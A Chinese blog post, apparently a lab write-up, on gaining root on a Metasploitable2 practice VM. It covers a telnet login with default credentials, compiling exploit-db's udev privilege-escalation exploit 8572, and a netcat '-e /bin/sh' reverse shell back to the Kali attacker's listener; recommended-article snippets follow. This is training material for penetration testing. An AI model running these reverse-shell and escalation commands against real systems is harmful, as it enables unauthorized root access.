msfconsle telnet 登陆Metasploittable2提权

最新推荐文章于 2025-11-10 20:11:48 发布
原创 最新推荐文章于 2025-11-10 20:11:48 发布 · 837 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细记录了使用Kali Linux对Metasploittable2进行安全渗透的过程,包括telnet登录、下载并利用exploit提升权限至root,以及通过netcat建立持久连接的步骤。

 

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:

step1:爆破Metasploittable2的telnet登陆密码,用户名:msfadmin,密码:msfadmin     //用户非root权限

step2:msf 登陆Metasploittable2后,下载exp,

地址:wget http://www.exploit-db.com/download/8572              //下载不下来,需要在kali linux中下载,然后开启apache3服务,再wget 下载。

step3:kali 中设置nc监听

使用 netcat 进行监听 后期返回的shell。

命令:nc -lvp 4444

step4:msf 登陆Metasploittable2中,编译执行exp,获取root

命令:gcc 源文件  -o  exploit echo '#!/bin/sh' > /tmp/run                  //此时源文件为8572.c

命令:echo '/bin/netcat -e /bin/sh ip地址 4444' >> /tmp/run           //此时ip地址为192.168.172.134

命令:ps -edf | grep udev                         //搜索udev程序的pid

step5:执行exploit   具有root权限的pid -1 ./exploit 数字pid -1 

命令:./exploit  2178               //原来pid为2179

总结:telnet登陆Metasploittable2,后为非root用户,需要做的就是提权,这里用到的是exp,然后nc进行连接。

02be55f
关注
Metasploitable2靶机学习
m0_46371267的博客
10-13 4684
Metasploitable2靶机渗透 什么是Metasploitable2? Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 使用步骤 下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download 默认用户名密码都为:msfadmin 下载下来后直接双击 网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 3405
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
Metasploitable 靶机渗透 + 复习手册(最终优化版)
最新发布
2501_93842368的博客
11-10 1202
(Metasploitable 专属,优先测试)信息收集:nmap 扫描核心是 “版本识别”,通过 SSH 版本和内核版本确定攻击方向兼容性问题:旧版 SSH 需指定和ssh-rsa算法核心:找文件,-quit内核漏洞:“找 EXP → 编译 → 执行” 通用流程渗透思路:信息收集 → SSH 登录 → → 敏感信息收集 → 持久化(完整闭环)
Metasploitable2安装基础----搭建DVWA
weixin_55205599的博客
06-07 3106
最近发现Metasploitable2是靶机,可以直接用DVWA,不用自己用phpstudy搭建环境了(都怪我之前不知道这个靶机,本地搭建DVWA老不成功,其实是包下载的问题)注意:下载下来是zip,解压后用VMware打开;下载下来是VMware的,直接用VMWare打开Metasploitable.vmx文件即可。Metasploitable系统的默认账号密码:msfadmin;命令:sudo passwd root。注:0/24是固定的 24什么含义?密码:password。命令:su root。
利用安全漏洞检测工具Metasploit对靶机Metasploitable2Telnet登录
weixin_45256499的博客
01-04 2098
1.实验环境 工具:kali下的metasploit 攻击者:192.168.43.35( kali ) 靶机:192.168.43.133(Metasploitable2Telnet协议是TCP/IP协议族中的一员,是internet远程登陆服务的标准协议和主要方式。它为用户供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。 虽然telnet
Metasploit升全剧终
Fly_鹏程万里
07-06 5937
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User限。低的限级别将会使我们受到很多的限制,所以必须将访问限从Guset升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高限,即Windows操作系统中管理员账号的限,或LINUX操作系统中root账户限。限的方式分为两类。纵向:低限角色获得高...
windows10 telnet登陆Metasploittable2
边城浪子的博客
08-26 313
实验环境: 控制机:windows10 ip:192.168.0.102 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:安装telnet windows10默认是不安装telnet “运行”----“control”----"添加删除程序"----"启动或关闭window功能"---"telnet开启"----确定 step2:...
telnet 弱口令爆破 菜刀
qq_56889067的博客
11-15 8163
第一题、使用2.txt密字典、爆破test用户的密码 使用nmap -sV 扫描目标靶机 IP 获取 靶机开启的端口及服务的版本信息。 发现开启的有2223 端口及服务。这里我们使用 telnet服务进行爆破、使用msfconsole打开永恒之蓝。 使用search telnet_login 查看 telnet爆破模块。 使用use 调用 此模块,接着在模块内使用命令options查看需要配置的参数。 接下来配置参数RHOSTS目标IP,PASS_FILE 密码字典,USE...
telnet 远程登陆实验
07-06
telnet实验
一键刷Telnet RoutAckProV1B2.rar
12-02
可适用于本工具的产品及版本 K3C V32.1.22.113及以上版本支持 K3 V21.5.37.246及以上版本支持 K2P A1/A2 V22.5.13.27及以上版本支持 K2P B1 V21.4.15.155及以上版本 K2 V22.6.503.31及以上版本支持 ...
一键开启 HG2534C1 光猫的 Telnet 访问(Windows).bat
04-20
EnableTelnetAccessForHG2534C1_v0.1 将 192.168.1.1 替换成你的光猫的 IP 地址 开启 HG2534C1 的 Telnet 访问 或者在浏览器中访问下面的地址
Telnet登录
Myu_wzy的博客
10-03 1616
一、实验环境 目标主机: Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 二、实验过程 1.msf登录telnet 详情参考Telnet暴力破解_Myu_wzy的博客-优快云博客此文章 2.msf连接shell下载exploit 在本地下载exploit,并将文件名修改为test.c(文本尾部多加几行空格) 连接shell下载本机的test.c文件 3.设置kali nc监听,进行监控4444
Metasploit拿到shell后 低限---
qq_58000413的博客
08-24 1822
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
6-9漏洞利用-Telnet登陆
山兔的博客
07-16 730
使用弱口令登录之后,进行
渗透测试学习系列之《Metasploitable介绍》(一)
DAkoll的博客
11-03 3287
Metasploitable是什么 ? Metasploitable 是一个刻意制作出来包含漏洞的Linux虚拟机系统。它可以用来做安全训练,测试安全工具和练习渗透测试技术。系统的默认账户 账号:msfadmin 密码:msfadmin 为官方建议你不要把这个易被攻击的虚拟机暴露在公共网络上(请使用NAT或者Host-only模式)有系统方面的问题可以联系系统的搭建者:msfdev@met
Metasploitable2使用指南
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1678
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 3万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
Metasplotable3 简易安装教程
firejq 的博客
11-06 1万+
点击此处阅读原文IntroductionMetasplotable3 相比 Metasplotable2 更为强大,其安装方法也繁琐复杂了许多,以下就自己的安装经历做简要总结。Install in VirtualBox 安装VirtualBox及其扩展包: 安装Vagrant安装后重启,会自动将vagrant添加至系统环境变量。 下载 metasploitable3 相关文件git clone ht
telnet登陆服务器
09-16
<think> 首先,用户的问题是关于“使用telnet登录服务器的方法”。我需要参考供的站内引用,但用户说“上述引用仅供参考”,所以我应该优先考虑用户的实际需求:即查找使用telnet登录服务器的方法。 从引用中,我可以取相关信息: - 引用[1]:描述了telnet是什么,它用于远程登录,用户可以在本地输入命令控制服务器。需要用户名和密码登录。 - 引用[2]:到Suse Linux中Telnet服务器默认禁用,并供解决方法。 - 引用[3]:展示了一个配置文件示例,如何启用telnet服务器(通过修改disable = yes 为 no)。 用户的问题是“查找使用telnet登陆服务器的方法”,所以我需要专注于如何作为客户端使用telnet登录服务器。 关键点: - Telnet是一个命令行工具,用于连接到远程服务器。 - 基本语法是:`telnet [hostname or IP address] [port]`,通常端口是23(默认Telnet端口)。 - 需要服务器的IP地址或主机名。 - 连接后,输入用户名和密码进行登录。 我需要供一个清晰、结构化的回答: 1. 介绍telnet的基本用途。 2. 解释如何安装telnet客户端(如果需要)。 3. 给出使用telnet登录服务器的步骤。 4. 包括示例命令。 5. 讨论安全性注意事项(因为telnet不加密,推荐使用SSH)。 回答结构: - 以中文回答。 - 使用系统级指令:行内数学表达式用$...$,独立公式用$$...$$(但这里可能不需要)。 - 生成相关问题。 - 在引用段落末尾添加引用标识。 生成相关问题: - 根据用户的问题,相关问题可以包括: 1. 如何在Windows/Linux上安装telnet2. Telnet与SSH的区别是什么? 3. 如何解决telnet连接问题? 4. Telnet的安全性风险? 确保回答真实可靠。 步骤: 1. 确认telnet客户端已安装(否则安装)。 2. 打开终端。 3. 输入telnet命令。 4. 登录并供凭证。 引用相关部分: - 从引用[1]:到用户名和密码登录。 - 从引用[3]:到配置文件,但那是服务器端,用户问的是登录方法(客户端),所以可能需要调整。 最终回答纲: - 段落1:介绍telnet登录的基本概念。 - 段落2:详细步骤。 - 段落3:示例。 - 段落4:安全建议。 - 然后列出相关问题。 </think> ### 使用Telnet登录服务器的方法 Telnet是一种基于TCP/IP协议的远程登录工具,允许用户通过本地终端连接到远程服务器并执行命令,就像直接操作服务器控制台一样[^1]。以下是使用Telnet登录服务器的详细步骤,适用于大多数操作系统(如Windows、Linux或macOS)。整个流程包括客户端安装、连接命令和登录验证,但请注意:**Telnet传输数据时不加密,存在安全风险,推荐优先使用SSH(Secure Shell)进行安全的远程登录**。 #### 步骤1: 确保Telnet客户端已安装 - Telnet客户端通常默认安装在Linux和macOS系统中。在Windows系统中,可能需要手动启用: - **Windows**:打开“控制面板” > “程序” > “启用或关闭Windows功能”,勾选“Telnet客户端”,然后点击“确定”安装。 - **Linux/macOS**:在终端运行命令检查是否安装:`telnet --version`。如果未安装,使用包管理器安装(例如,Ubuntu/Debian:`sudo apt install telnet`;macOS:`brew install telnet`)。 - 如果服务器端Telnet服务未启用(如引用[3]所述),需确保服务器已配置并启动Telnet守护进程(例如,在Linux中修改`/etc/xinetd.d/telnet`文件,设置`disable = no`)。 #### 步骤2: 使用Telnet命令连接服务器 在本地终端(命令示符或Shell)中执行以下命令: 1. **基本连接命令**: - 语法:`telnet [服务器IP地址或主机名] [端口号]` - 默认端口号为23(Telnet标准端口),如果服务器使用自定义端口,需指定。 - 示例:连接IP为`192.168.1.100`的服务器: ```bash telnet 192.168.1.100 23 ``` 或者直接使用主机名: ```bash telnet example.com ``` 2. **登录过程**: - 连接成功后,终端会示输入用户名和密码(如引用[1]所述)。 - 输入服务器管理员供的凭证(例如,用户名`root`和密码`your_password`)。 - 登录成功后,命令行示符会变为服务器端的示符(如`[root@server ~]#`),此时可输入任何服务器命令(例如`ls`或`pwd`)。 - 示例输出: ``` Trying 192.168.1.100... Connected to 192.168.1.100. Escape character is '^]'. login: root Password: ******** [root@server ~]# ``` #### 步骤3: 断开连接和常见问题处理 - **断开连接**:输入`exit`或`logout`命令,或按`Ctrl + ]`后输入`quit`。 - **常见问题**: - **连接失败**:检查服务器IP是否正确、端口是否开放(使用`ping`或`telnet`测试网络连通性)。如引用[2]所述,在Suse Linux等系统中,Telnet服务器可能默认禁用,需在服务器端启用服务。 - **认证失败**:确保用户名和密码正确;服务器可能限制了远程登录限。 - **安全警告**:Telnet不加密数据,易受中间人攻击,建议仅在内网环境使用。对于公网服务器,优先使用SSH(例如`ssh root@192.168.1.100`)。 #### 示例完整流程 假设服务器IP为`10.0.0.5`,用户名`admin`: ```bash # 在本地终端执行 telnet 10.0.0.5 # 系统响应后输入凭证 login: admin Password: admin_password # 登录成功后执行命令 admin@server$ whoami admin # 断开连接 admin@server$ exit ``` 此方法基于Telnet协议标准实现,适用于大多数环境[^1][^3]。 ### 相关问题 1. Telnet与SSH有什么区别?哪个更安全? 2. 如何在Linux服务器上启用Telnet服务? 3. Telnet连接失败时如何进行故障排除? 4. 为什么在现代系统中不建议使用Telnet
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值